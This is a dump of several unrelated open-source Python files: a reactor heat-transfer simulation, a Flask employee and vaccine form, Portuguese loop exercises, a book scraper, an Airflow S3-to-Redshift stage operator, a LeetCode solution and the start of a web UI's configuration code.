0.026*re_l**0.8*pr_l**0.333*1**0.14 # Bird\nalpha_o = nu_l * lambda_l/d_i * \\\n 60**2 * 1/4.184 * 1/1000 # W/m/K * 1000cal/4184J *\n# 60^2s/h\noutput = [\n 'Kühlmittel: Wasser bei Sättigung bei 230°C '+\n '(28bar) (VDI-Wärmeatlas)',\n 'rho_l = ' + '{:g}'.format(rho_l) + ' kg/m^3',\n 'cp_l = ' + '{:g}'.format(cp_l) + ' kJ/kg/K',\n 'eta_l = ' + '{:g}'.format(eta_l) + ' Pa s',\n 'Pr_l = ' + '{:g}'.format(pr_l) + ' ',\n 'Voll-ausgebildete turbulente Strömung:',\n 'Re_l = ' + '{:g}'.format(re_l) + ' ',\n 'Nusselt-Zahl bei voll-ausgebildeter turbulenter' +\n 'Strömung (Gl. 26 Kap. G1 VDI-Wärmeatlas)',\n 'xi_l = ' + '{:g}'.format(xi_l) + ' ',\n 'Nu_l = ' + '{:g}'.format(nu_l) + ' ',\n 'Bezugslänge: Innendurchmesser des Rohrbündels ' +\n 'mit 2500 Rohren, je 2,54cm',\n 'd_i = ' + '{:g}'.format(d_i) + ' m',\n 'Wärmeübergangskoeffizient im Mantel',\n 'alpha_o = ' + '{:g}'.format(alpha_o) +\n ' kcal/h/m^2/°C',\n]\nprint('\\n'.join(output))\n\nl_r = 3 # m\nd = 2.54 * 1 / 100. # m\nn = 2500 # Rohre\nt = t0\ndp = 3 / 1000. # m\nrho_b = 1300 # Bulk density = rhoc*(1-phi) # kgKat/m^3\nya0 = 1 / 100. # < 1 mol%\np = 1 # atm\nn_p = 1650 # t/a\ng = 1650*1000./365./24./2500./(3.14/4*0.025**2)\n# kg / m^2/h * 1h/(60^2 s) = kg/m^2/s\ng = 4684 # kg / m^2/h * 1h/(60^2 s) = kg/m^2/s\nrho_g = 1.293 # kg/m^3\nu_s = g / rho_g # kg/m^2/h / kg*m^3 = m/h\ndelta_h_r = -307000. # kcal/kmol\ncp = 0.237 # kcal/(kg °C)\npb0 = y_i[1] * 1 # atm\n\nre = dp * g / mu * 1/60.**2 # [=] m * kg/m^2/h /kg *m*s\n# = [dimlos]\npr = mu / (lambda_g / (cp_g*4.184*1000)) # [dimlos]\n# Levas Korrelation\nnu = 3.50 * (re) ** 0.7 * np.exp(-4.6 * dp / d)\nalpha_i = nu * lambda_g / d / 4.184 / 1000 * 60 ** 2 # W/m^2/K\n# * 1cal/4.184J * 1kcal/1000cal * 60^2s/h = kcal/h/m^2/K\nu = 1 / (1 / alpha_i + w_d / lambda_m + 1 / alpha_o)\n\n\ndef df_dy(y, z0):\n p = y[0]\n t = y[1]\n k_t = np.exp(19.837 - 13636 / t)\n # k_t[=] kmol/kgKat/h * atm^-2\n r_a = k_t * pb0 * p # kmol/kgKat/h\n dp_dz = -mm_g * 1 * rho_b / rho_g * r_a / u_s\n dt_dz = -delta_h_r / (\n rho_g * cp\n ) * rho_b * r_a / (u_s) - 4 / d * u / (\n rho_g * cp) / (u_s) * (t - t0)\n return np.array([dp_dz, dt_dz])\n\n\nz = np.linspace(0, 3.0, 100)\n\npb0 = y_i[1] * 1 # atm\nmm_g = np.array([28, 32, 40, 78.11]) # g/mol\nmm_g = sum(y_i * mm_g).item()\np0_t0 = np.array([y_i[-1] * 1, t0])\ny, info = integrate.odeint(\n df_dy, p0_t0, z, full_output=True\n)\n\noutput = [\n 'Prozessstrom Kennzahlen',\n 'Pr = ' + '{:g}'.format(pr) + ' ',\n 'Re = ' + '{:g}'.format(re) + ' ',\n 'Nusselt-Zahl mit ruhenden Feststoffpartikeln\\n' +\n '(Schüttschicht), nach Levas Korrelation in \\n' +\n 'Behr Gmehling Techn. Chemie',\n 'Nu = ' + '{:g}'.format(nu) + ' ',\n 'Bezugslänge: Innendurchmesser des Rohrbündels ',\n 'd = ' + '{:g}'.format(d) + ' m',\n 'Wärmeübergangskoeffizient im Rohr',\n 'alpha_i = ' + '{:g}'.format(alpha_i) +\n ' kcal/h/m^2/°C',\n 'Mittlerer Wärmeübergangskoeffizient',\n 'U = ' + '{:g}'.format(u) +\n ' kcal/h/m^2/°C',\n]\nprint('\\n'.join(output))\n\nfig = plt.figure(figsize=(20 * 12 / 30.48, 30 * 12 / 30.48))\nax1 = plt.subplot(211)\nplt.setp(ax1.get_xticklabels(), visible=False)\nax2 = plt.subplot(212, sharex=ax1)\nax1.set_ylim([0, 0.02])\nax2.set_ylim([625, 725])\nax1.set_xlim([0, 1.25])\nax1.set_ylabel('$p_0 / atm$')\nax2.set_ylabel('T / K')\nax2.set_xlabel('z / m')\n\nfor p0 in [0.011, 0.012, 0.013, 0.015,\n 0.016, 0.017, 0.018, 0.0181,\n 0.0182, 0.019]:\n y_i = np.array([78, 21, 1, p0 * 100]) / sum(\n np.array([78, 21, 1, p0 * 100], dtype=float))\n pb0 = y_i[1] * 1 # atm\n # mm_g = np.array([28, 32, 40, 78.11]) # g/mol\n # mm_g = sum(y_i * mm_g).item()\n p0_t0 = np.array([y_i[-1], t0])\n y, info = integrate.odeint(\n df_dy, p0_t0, z, full_output=True\n )\n\n ax1.plot(z, y[:, 0], label=str(p0))\n ax2.plot(z, y[:, 1], label=str(p0))\n index_max = np.argmax(y[:, 1])\n x_max = z[index_max]\n y_max = y[index_max, 1]\n ax2.annotate('$p_0=' + str(p0) + '$',\n xy=(x_max, y_max))\n\nax1.legend()\nax2.legend();\nplt.show()","repo_name":"santiago-salas-v/walas","sub_path":"bsp_11_5_b_fr_b.py","file_name":"bsp_11_5_b_fr_b.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27035971710","text":"from datetime import datetime\n\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\nfrom .models import Employee, Vaccine, Covid_cases\nfrom . import db\nfrom flask_login import current_user\n\nadd_employee = Blueprint('add_employee', __name__)\n\n\ndef is_valid_id(id_number):\n id_number = str(id_number).strip()\n if len(id_number) != 9:\n return False\n if not id_number.isdigit():\n return False\n id_sum = 0\n for i, digit in enumerate(id_number[:-1]):\n weight = (i % 2) + 1 # משקל הספרה תלוי במיקום שלה במספר\n digit_sum = sum(int(d) for d in str(int(digit) * weight))\n id_sum += digit_sum\n check_digit = (10 - (id_sum % 10)) % 10\n return check_digit == int(id_number[-1])\n\n\n@add_employee.route('/create-employee', methods=['GET', 'POST'])\ndef create_employee():\n if request.method == 'POST':\n first_name = request.form.get('firstName')\n last_name = request.form.get('lastName')\n id_number = request.form.get('idNumber')\n address_city = request.form.get('addressCity')\n address_street = request.form.get('addressStreet')\n address_number = request.form.get('addressNumber')\n birth_date = None\n date_str = request.form.get('birthDate')\n # birth_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n if date_str:\n birth_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n phone_number = request.form.get('phoneNumber')\n mobile_number = request.form.get('mobileNumber')\n date_str = request.form.get('vaccine1Date')\n vaccine1_date = None\n if date_str:\n vaccine1_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine1_manufacturer = request.form.get('vaccine1Manufacturer')\n date_str = request.form.get('vaccine2Date')\n vaccine2_date = None\n if date_str:\n vaccine2_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine2_manufacturer = request.form.get('vaccine2Manufacturer')\n date_str = request.form.get('vaccine3Date')\n vaccine3_date = None\n if date_str:\n vaccine3_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine3_manufacturer = request.form.get('vaccine3Manufacturer')\n date_str = request.form.get('vaccine4Date')\n vaccine4_date = None\n if date_str:\n vaccine4_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n vaccine4_manufacturer = request.form.get('vaccine4Manufacturer')\n date_str = request.form.get(\"positiveResultDate\")\n positive_result_date = None\n if date_str:\n positive_result_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n date_str = request.form.get(\"recoveryDate\")\n recovery_date = None\n if date_str:\n recovery_date = datetime.strptime(date_str, '%Y-%m-%d').date()\n\n employee = Employee.query.filter_by(id_number=id_number).first()\n if employee:\n flash('מספר זהות כבר קיים במערכת', category='error')\n elif not is_valid_id(id_number):\n flash('מספר זהות לא תקין', category='error')\n elif len(phone_number) < 9:\n flash('מספר טלפון חייב להכיל יותר מ-8 תווים', category='error')\n elif len(mobile_number) < 10:\n flash('מספר נייד חייב להכיל יותר מ-8 תווים', category='error')\n elif len(first_name) < 2:\n flash('שם פרטי חייב להכיל יותר מתו אחד', category='error')\n elif len(last_name) < 2:\n flash('שם משפחה חייב להכיל יותר מתו אחד', category='error')\n elif len(address_city) < 2:\n flash('שם העיר חייב להכיל יותר מתו אחד', category='error')\n elif len(address_street) < 2:\n flash('שם רחוב חייב להכיל יותר מתו אחד', category='error')\n elif len(address_number) < 1:\n flash('חובה להכניס מספר בית', category='error')\n elif birth_date is None:\n flash('חובה להכניס תאריך לידה', category='error')\n elif positive_result_date is not None and positive_result_date > recovery_date:\n flash('תאריך תוצאה חיובית חייב להיות לפני תאריך החלמה', category='error')\n else:\n new_employee = Employee(first_name=first_name, last_name=last_name, id_number=id_number,\n address_city=address_city, address_street=address_street,\n address_number=address_number, birth_date=birth_date, phone_number=phone_number,\n mobile_number=mobile_number)\n db.session.add(new_employee)\n db.session.commit()\n last_employee = db.session.query(Employee).order_by(Employee.id.desc()).first()\n last_employee_id = last_employee.id\n\n vaccine1 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine1_date,\n vaccine_manufacturer=vaccine1_manufacturer)\n vaccine2 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine2_date,\n vaccine_manufacturer=vaccine2_manufacturer)\n vaccine3 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine3_date,\n vaccine_manufacturer=vaccine3_manufacturer)\n vaccine4 = Vaccine(employee_id=last_employee_id, vaccine_date=vaccine4_date,\n vaccine_manufacturer=vaccine4_manufacturer)\n\n covid_case = Covid_cases(employee_id=last_employee_id, positive_result_date=positive_result_date,\n recovery_date=recovery_date)\n\n if vaccine1:\n db.session.add(vaccine1)\n db.session.commit()\n if vaccine2:\n db.session.add(vaccine2)\n db.session.commit()\n if vaccine3:\n db.session.add(vaccine3)\n db.session.commit()\n if vaccine4:\n db.session.add(vaccine4)\n db.session.commit()\n if covid_case:\n db.session.add(covid_case)\n db.session.commit()\n #\n # file = request.files['fileInput']\n # file.save(file.filename)\n\n flash('העובד נוסף בהצלחה!', category='success')\n return redirect(url_for('add_employee.create_employee'))\n\n return render_template(\"add_employee.html\", user=current_user)\n\n\n\n","repo_name":"esterblass/Hadasim_exe","sub_path":"Covid_wesite/website/add_employee.py","file_name":"add_employee.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14331451582","text":"#Exercícios de fixação WHILE (lista 1)\n\n'''\nExercício 1. Crie um programa que pede para o usuário digitar o nome de 13 pessoas\npelo teclado.\n'''\ndef coletarNomes():\n i = 0\n nomes = []\n while i < 13:\n nomes.append(input(\"Digite um nome: \"))\n i += 1\n print(nomes)\n\n#coletarNomes()\n \n'''\nExercício 2. Crie um programa que imprime os números de 0 a 1000.\n'''\n\ndef imprimirNumeros1000():\n i = 0\n while i <= 1000:\n print(i)\n i += 1 \n\n#imprimirNumeros1000()\n\n'''\nExercício 3. Crie um programa que imprime os números pares de 0 a 2000.\n'''\ndef imprimirPares2000():\n i = 0\n while i <= 2000:\n if i % 2 == 0:\n print(i)\n i += 1 \n\n#imprimirPares2000()\n\n'''\nExercício 4. Crie um programa que imprime os números de 0 a 1000 em ordem\ndecrescente (ou seja, de 1000 a 0).\n'''\n\ndef imprimirNumeros1000Decrescente():\n i = 1000\n while i >= 0:\n print(i)\n i -= 1 \n\n#imprimirNumeros1000Decrescente()\n\n\n'''\nExercício 5. Crie um programa que solicita o time de 10 usuários pelo teclado. Ao final,\nimprima quantos torcedores torcem para o Grêmio.\n'''\ndef contarTorcedores():\n \n torcedoresGremio = 0\n i = 0\n \n while i < 10:\n \n if input(\"Digite seu time: \").lower() == \"grêmio\":\n torcedoresGremio += 1\n \n i += 1\n \n print(f\"O número de torcedores do Grêmio é {torcedoresGremio}.\")\n\n#contarTorcedores()\n\n\n'''\nExercício 6. Crie um programa que pede para o usuário digitar 20 números com ponto\nflutuante pelo teclado. Ao final, seu programa deve imprimir todos os números\ndigitados. Dica: armazene-os em uma string e concatene os valores digitados. No final,\nimprima a string.\n'''\n\ndef digitarFlutuantes():\n\n numeros = 0.0\n i = 1\n\n while i <= 20:\n\n numeros = numeros + float(input(f\"Digite o {i}º número flutuante: \"))\n \n i += 1\n\n print(f\"O resultado da soma é {numeros}.\")\n\n#digitarFlutuantes()\n\n\n\n\n'''\nExercício 7. Crie um programa que solicita para o usuário que ele digite 10 valores\ninteiros. Ao final, imprima a soma de todos os valores digitados.\n'''\n\ndef digitarInteiros():\n\n numeros = 0\n i = 1\n\n while i <= 10:\n\n numeros = numeros + int(input(f\"Digite o {i}º número inteiro: \"))\n \n i += 1\n\n print(f\"O resultado da soma é {numeros}.\")\n\n#digitarInteiros()\n\n\n\n'''\nExercício 8. Crie um programa que pergunta para o usuário (via Teclado) quantos\nnúmeros ele irá digitar e armazena em uma variável chamada quant. Logo após, faça\ncom que o usuário digite quant números inteiros, e para cada número digitado imprima\nna tela se o número é negativo, positivo ou zero.\n'''\n\ndef criarQuantidadeNumeros():\n\n i = 0\n\n quantidade = int(input(\"Digite a quantidade de números a serem armazenados: \"))\n\n while i < quantidade:\n\n numeroTeste = int(input(\"Digite um número a ser testado: \"))\n\n if numeroTeste == 0:\n print(\"O número é zero.\")\n \n \n elif numeroTeste > 0:\n print(f\"{numeroTeste} é positivo.\")\n \n else:\n print(f\"{numeroTeste} é negativo.\")\n\n i += 1\n\n\n\n#criarQuantidadeNumeros()\n \n\n\n\n'''\nExercício 9. Crie um programa que pede para o usuário digitar 2 valores inteiros via\nTeclado (val1 e val2). Se nenhum dos valores for negativo, escreva os números pares\nentre o menor e o maior valor.\n'''\n\ndef numerarParesRange():\n\n val1 = abs(int(input(\"Digite o primeiro valor: \")))\n val2 = abs(int(input(\"Digite o segundo valor: \")))\n\n maiorNumero = val1 if val1 > val2 else val2\n menorNumero = val1 if val1 < val2 else val2\n \n while menorNumero < maiorNumero:\n if menorNumero % 2 == 0:\n print(menorNumero)\n menorNumero += 1\n\n#numerarParesRange()\n\n\n'''\nExercício 10. Crie um programa que faça a soma dos valores de 0 até 198.\n'''\n\ndef somar198():\n\n somatorio = 0\n\n i = 0\n\n while i < 198:\n\n somatorio = somatorio + i\n \n i += 1\n\n print(somatorio)\n\n\n#somar198()\n\n'''\nExercício 11. Crie um programa que imprima a soma dos valores pares e a soma dos\nvalores ímpares entre dois números quaisquer digitados pelo usuário.\n'''\n\ndef somaParImparRange():\n \n val1 = abs(int(input(\"Digite o primeiro valor: \")))\n val2 = abs(int(input(\"Digite o segundo valor: \")))\n\n maiorNumero = val1 if val1 > val2 else val2\n menorNumero = val1 if val1 < val2 else val2\n\n somatorioPares = 0\n somatorioImpares = 0\n \n while menorNumero < maiorNumero:\n if menorNumero % 2 == 0:\n somatorioPares = somatorioPares + menorNumero\n\n else:\n somatorioImpares = somatorioImpares + menorNumero\n \n menorNumero += 1\n\n print(f\"Somatório dos números pares: {somatorioPares}\")\n print(f\"Somatório dos números ímpares: {somatorioImpares}\")\n\n#somaParImparRange()\n\n\n'''\nExercício 12. Crie um programa que pede para o usuário digitar números positivos via\nTeclado. Quando o usuário digitar um número negativo, informe a média de todos os\nnúmeros que ele informou.\n'''\n\ndef somarPositivos():\n\n numeroDigitado = 1\n denominador = 0\n somatorio = 0\n\n while numeroDigitado:\n\n resposta = int(input(\"Digite um número a ser somado: \"))\n\n if resposta < 0:\n\n numeroDigitado = 0\n\n print(f\"A média do somatório é {somatorio/denominador}.\")\n\n denominador += 1\n\n somatorio += resposta\n\n#somarPositivos()\n\n\n'''\nExercício 13. Crie um programa que calcule o fatorial de um número informado pelo\nusuário (não permita números negativos).\n'''\n\ndef calcularFatorial():\n\n i = 0\n\n fatorial = abs(int(input(\"Digite um número para calcular o fatorial: \")))\n \n i = fatorial\n\n while i > 1:\n \n fatorial = fatorial * (i - 1)\n\n i -= 1\n\n print(f\"O resultado do cálculo fatorial é: {fatorial}\")\n\n#calcularFatorial()\n\n'''\nExercício 14. Crie um programa que diga se o número informado pelo usuário é primo\nou não.\n'''\n\ndef definirPrimo():\n\n resposta = abs(int(input(\"Digite um número para saber se ele é primo: \")))\n \n numeroDivisores = 0\n \n i = resposta \n\n while i > 0:\n\n if resposta % i == 0:\n numeroDivisores += 1\n\n if numeroDivisores > 2:\n print(f\"{resposta} não é número primo.\")\n return\n \n i -= 1\n\n print(f\"{resposta} é número primo\")\n\n#definirPrimo()\n\n\n'''\nExercício 15. Crie um programa que imprime os números primos entre 0 e 200,\nimprimindo ao final a soma destes números.\n'''\n\ndef somarPrimos200():\n \n displayNumeros = []\n\n somatorioPrimos = 0\n\n numeroDivisores = 0\n\n numero = 200\n \n i = numero \n\n while numero > 0:\n\n numeroDivisores = 0\n\n i = numero\n\n while i > 0:\n \n if numero % i == 0:\n numeroDivisores += 1\n\n i -= 1 \n\n if numeroDivisores == 2:\n somatorioPrimos += numero\n displayNumeros.append(numero)\n \n numero -= 1\n\n \n print(f\"\\nLista de números primos:\\n\\n{displayNumeros}\")\n print(f\"\\nSomatório de números primos: {somatorioPrimos}\")\n\n\n#somarPrimos200()\n\n","repo_name":"aindadecarbono/unisinos-exercicios","sub_path":"lab-1/s3-s4/ex-s3-s4-while1.py","file_name":"ex-s3-s4-while1.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39367147079","text":"from book_module import scrap_book\nfrom one_category_module import scrap_category\nfrom category_module import get_all_categories\nfrom io_module import export_to_csv, create_dir, clean_files, save_image\n\n# Importer un module depuis un subfolder\n# → https://stackoverflow.com/questions/8953844/import-module-from-subfolder\n\ndef main():\n \"Entry point\"\n print(\"~~~~~~~~~~~~\")\n print(\"~~~ main ~~~\")\n print(\"~~~~~~~~~~~~\")\n\n all_categories = get_all_categories()\n\n for category in all_categories:\n print(f\"→ getting all books' urls from category: {category.name}\")\n print(\"-----------------------------------------------\")\n\n index = 0 # we track index to have a row number in csv\n books_data = []\n books_urls = scrap_category(category)\n\n dir_prefix = \"data\"\n cat_dir_path = dir_prefix + '/' + category.name.lower()\n\n create_dir(dir_prefix)\n create_dir(cat_dir_path)\n\n for book_url in books_urls:\n index += 1\n book_data = scrap_book(book_url)\n\n book_data.insert(0, index)\n books_data.append(book_data)\n\n\n last_arr_index = len(book_data) - 1\n image_url = book_data[last_arr_index]\n image_path_to_save = f\"{cat_dir_path}/{(book_data[3]).replace('/','')}\"\n\n save_image(image_url, image_path_to_save)\n\n export_to_csv(category, books_data, cat_dir_path)\n \n # limit the process to 1 category\n # remove the \"return True\" to process all categories\n \n\ndef dir_test():\n \"Dir test\"\n #create_dir(\"img_2\")\n clean_files(\".jpg\")\n\nmain()","repo_name":"MAM95190/projet_2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21249364762","text":"import cv2\nimport numpy as np\n\nclass PossiblePlate:\n\t\"\"\"\n\t:self.imgPlate: original image\n\t:self.imgGrayscale: grayscale image\n\t:self.imgThresh: thresholded image\n\t:self.rrLocationOfPlateInScene: rectangle location in scene\n\t:self.strChars: plate value found\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.imgPlate = None\n\t\tself.imgGrayscale = None\n\t\tself.imgThresh = None\n\t\tself.rrLocationOfPlateInScene = None\n\t\tself.strChars = \"\"","repo_name":"aseams/License-Plate-Recognition","sub_path":"PossiblePlate.py","file_name":"PossiblePlate.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"8934036520","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.contrib.hooks.aws_hook import AwsHook\nimport datetime\n\nclass StageToRedshiftOperator(BaseOperator):\n \"\"\" Airflow Operator to load stage tables by reading in data from S3.\n Data may be either in JSON or CSV format. \n Args:\n * aws_credentials_id: AWS credentials to read from S3\n * redshift_conn_id : Redshift connection ID\n * table: Staging table to load from data file in S3\n * s3_source: S3 source that has the staging files\n * json_paths: JSON paths of stage data files\n * file_type: File type of data files. JSON for example\n * delimiter: Delimiter used in stage data file\n * execution_date: Date of airflow run\n * backfill: Boolean flag indicating if backfill of data is needed\n \"\"\"\n \n ui_color = '#358140'\n\n @apply_defaults\n def __init__(self, \n aws_credentials_id=\"\",\n redshift_conn_id=\"\",\n table=\"\",\n s3_source=\"\",\n file_type= \"\", #CSV or JSON\n json_paths=\"\",\n delimiter=\",\",\n ignore_headers=1,\n execution_date=\"\",\n backfill=False,\n *args, **kwargs):\n\n super(StageToRedshiftOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.aws_credentials_id = aws_credentials_id\n self.table = table\n self.s3_source = s3_source\n self.file_type = file_type\n self.json_paths = json_paths\n self.delimiter = delimiter\n self.ignore_headers = ignore_headers\n self.execution_date = execution_date\n self.backfill = backfill\n\n def execute(self, context):\n ''' Copy data from S3 into stage table. Data may be in either json or csv format\n Support back fill of data if required.\n '''\n self.log.info(f\"Staging data to {self.table}\")\n aws_hook = AwsHook(self.aws_credentials_id)\n credentials = aws_hook.get_credentials()\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n self.log.info(f\"Truncate stage table: {self.table}\")\n redshift.run(\"TRUNCATE TABLE {}\".format(self.table)) \n\n if self.backfill:\n exec_date = self.execution_date.format(**context)\n self.log.info(\"Execution_date: {}\".format(exec_date))\n exec_date_obj = datetime.datetime.strptime( exec_date ,'%Y-%m-%d')\n year = exec_date_obj.year\n month = exec_date_obj.month\n s3_source = self.s3_source+'/'+year+'/'+month\n self.s3_source = s3_source\n self.log.info(\"Execution_date: {}\".format(s3_source))\n \n self.log.info(f\"Load data to staging table: {self.table}\")\n if self.file_type == \"JSON\":\n copy_query = \"\"\"\n COPY {table}\n FROM '{s3_source}' \n ACCESS_KEY_ID '{access_key}'\n SECRET_ACCESS_KEY '{secret_key}'\n {file_type} '{json_paths}';\n \"\"\".format(table=self.table,\n s3_source=self.s3_source,\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n file_type=self.file_type,\n json_paths=self.json_paths)\n elif self.file_type == \"CSV\":\n copy_query = \"\"\"\n COPY {table}\n FROM '{s3_source}'\n ACCESS_KEY_ID '{access_key}'\n SECRET_ACCESS_KEY '{secret_key}'\n IGNOREHEADER {}\n DELIMITER '{}'\n {file_type};\n \"\"\".format(table=self.table,\n s3_source=self.s3_source,\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n file_type=self.file_type,\n delimiter=self.delimiter,\n ignore_headers=self.ignore_headers)\n else:\n self.log.error(\"Unsupported input file type\")\n raise ValueError(\"Unsupported input file type.\")\n\n redshift.run(copy_query)\n \n self.log.info(f\"Completed loading data to {self.table}\")\n\n\n\n\n\n","repo_name":"msankar/dataengineer-nd","sub_path":"projects/airflow_datapipeline/airflow/plugins/operators/stage_redshift.py","file_name":"stage_redshift.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"44068583819","text":"from heapq import heappush, heappop\nfrom collections import defaultdict\nclass Solution:\n def isPossible(self, nums: List[int]) -> bool:\n \n if not nums: return True\n \n queue = defaultdict(list) # key = value of last element in subsequence; value = [(length_of_subsequence, subsequence_identifier)]\n \n for num in nums:\n if queue[num-1]:\n length = heappop(queue[num-1])\n heappush(queue[num], length+1)\n else:\n heappush(queue[num], 1)\n \n for heap in queue.values():\n while heap:\n if heap.pop() < 3: return False\n \n return True","repo_name":"arw2019/AlgorithmsDataStructures","sub_path":"Split Array into Consecutive Subsequences/Leetcode_659.py","file_name":"Leetcode_659.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71375369962","text":"import os\nimport errno\nimport time\nimport datetime\nimport json\nimport logging\nimport threading\n\nfrom six import string_types\n\n# Session management\nfrom beaker.middleware import SessionMiddleware\n\n# Command line interpreter\nfrom docopt import docopt, DocoptExit\n\n# Bottle Web framework\nimport bottle\nfrom bottle import run, abort, redirect, request, response, static_file\nfrom bottle import template, BaseTemplate, TEMPLATE_PATH\nfrom bottle import RouteBuildError, parse_auth\n\n# Application import\nfrom alignak_webui import __manifest__, set_app_config\nfrom alignak_webui.utils.logger import setup_logging, ROOT_LOGGER_NAME\nfrom alignak_webui.utils.locales import init_localization\nfrom alignak_webui.backend.backend import BackendException\nfrom alignak_webui.backend.datamanager import DataManager\nfrom alignak_webui.webui import WebUI\n\napp = application = bottle.Bottle()\n\n# -----\n# Simple mode for the application\n# -----\nif os.environ.get('ALIGNAK_WEBUI_REDUCED', False):\n print(\"Application is in reduced mode. No backend, no authentication. \"\n \"Simple Alignak WS reading!\")\n\n# -----\n# Test mode for the application\n# -----\nif os.environ.get('ALIGNAK_WEBUI_TEST', False):\n print(\"Application is in test mode\")\nelse: # pragma: no cover, because tests are run in test mode\n print(\"Application is in production mode\")\n\nargs = {}\nif __name__ == '__main__':\n try:\n print(\"Parsing command line arguments\")\n args = docopt(__doc__, version=__manifest__['version'])\n except DocoptExit as exp:\n print(\"Command line parsing error: \\n%s\" % exp)\n exit(64)\n\n# -----\n# Application configuration file\n# -----\napp_name = __manifest__['name'].lower()\n# Search for configuration files in several locations\ncfg_filenames = [\n '/usr/local/etc/%s/settings.cfg' % app_name,\n '/etc/%s/settings.cfg' % app_name,\n '~/%s/settings.cfg' % app_name,\n os.path.abspath('./etc/%s/settings.cfg' % app_name),\n os.path.abspath('../etc/settings.cfg'),\n os.path.abspath('./etc/settings.cfg'),\n os.path.abspath('./settings.cfg'),\n]\n# Configuration file name in environment\nif os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_FILE'):\n cfg_filenames = [os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_FILE')]\n print(\"Application configuration file name from environment: %s\" % cfg_filenames)\n# Configuration file name in command line parameters\nif '' in args and args['']: # pragma: no cover, tested but not coverable\n cfg_filenames = args['']\n print(\"Application configuration file name from command line: %s\" % cfg_filenames)\n\n\napp_configuration_file = None\nfor cfg_filename in cfg_filenames:\n if os.path.isfile(cfg_filename):\n app.config.load_config(cfg_filename)\n print(\"Configuration read from: %s\" % cfg_filename)\n app_configuration_file = cfg_filename\n break\nelse: # pragma: no cover, tested but not coverable\n print(\"***** Application configuration file not found.\")\n print(\"***** Searched in: %s\" % cfg_filenames)\n exit(1)\n\n# -----\n# Check application configuration file change\n# -----\n# todo: not yet tested\nif os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_THREAD'): # pragma: no cover, not yet tested\n def check_config(_app, filename, interval=5):\n \"\"\"Thread to check if configuration file changed\"\"\"\n print(\"Thread for checking configuration file change, file: %s\" % filename)\n modification_time = os.path.getmtime(filename)\n while True:\n time.sleep(interval)\n print(\"Checking configuration file change...\")\n if modification_time < os.path.getmtime(filename):\n print(\"Application configuration file changed, reloading configuration...\")\n modification_time = os.path.getmtime(filename)\n _app.config.load_config(filename)\n cfg_check_thread = threading.Thread(target=check_config,\n name='application_configuration_check',\n args=(app, app_configuration_file, 10))\n cfg_check_thread.daemon = True\n cfg_check_thread.start()\n\n# -----\n# Debug and test mode\n# -----\nenv_debug = os.environ.get('BOTTLE_DEBUG', False)\nif env_debug and env_debug == '1': # pragma: no cover, tested but not coverable\n app.config['bottle.debug'] = True\n print(\"Bottle is in debug mode from environment\")\n\nenv_debug = os.environ.get('ALIGNAK_WEBUI_DEBUG', False)\nif env_debug and env_debug == '1': # pragma: no cover, tested but not coverable\n app.config['%s.debug' % app_name] = True\n print(\"Application is in debug mode from environment\")\n\nif '--debug' in args and args['--debug']: # pragma: no cover, tested but not coverable\n app.config['bottle.debug'] = True\n app.config['%s.debug' % app_name] = True\n print(\"Application is in debug mode from command line\")\n\n# -----\n# Application backend\n# -----\nif os.environ.get('ALIGNAK_WEBUI_BACKEND'): # pragma: no cover, tested but not coverable\n app.config['%s.alignak_backend' % app_name] = os.environ.get('ALIGNAK_WEBUI_BACKEND')\n print(\"Application backend from environment: %s\" % os.environ.get('ALIGNAK_WEBUI_BACKEND'))\nif '--backend' in args and args['--backend']: # pragma: no cover, tested but not coverable\n app.config['%s.alignak_backend' % app_name] = args['--backend']\n print(\"Application backend from command line: %s\" % args['--backend'])\n\nprint(\"Application backend: %s\" % app.config.get('%s.alignak_backend' % app_name,\n 'http://127.0.0.1:5000'))\n\n# -----\n# Alignak web services\n# -----\nif os.environ.get('ALIGNAK_WEBUI_WS'):\n app.config['%s.alignak_ws' % app_name] = os.environ.get('ALIGNAK_WEBUI_WS')\n print(\"Alignak Web Services from environment: %s\" % os.environ.get('ALIGNAK_WEBUI_WS'))\nif '--ws' in args and args['--ws']:\n app.config['%s.alignak_ws' % app_name] = args['--ws']\n print(\"Alignak Web Services from command line: %s\" % args['--ws'])\n\nprint(\"Alignak Web Services: %s\" % app.config.get('%s.alignak_ws' % app_name,\n 'http://127.0.0.1:8888'))\n\nif '--host' in args and args['--host']: # pragma: no cover, tested but not 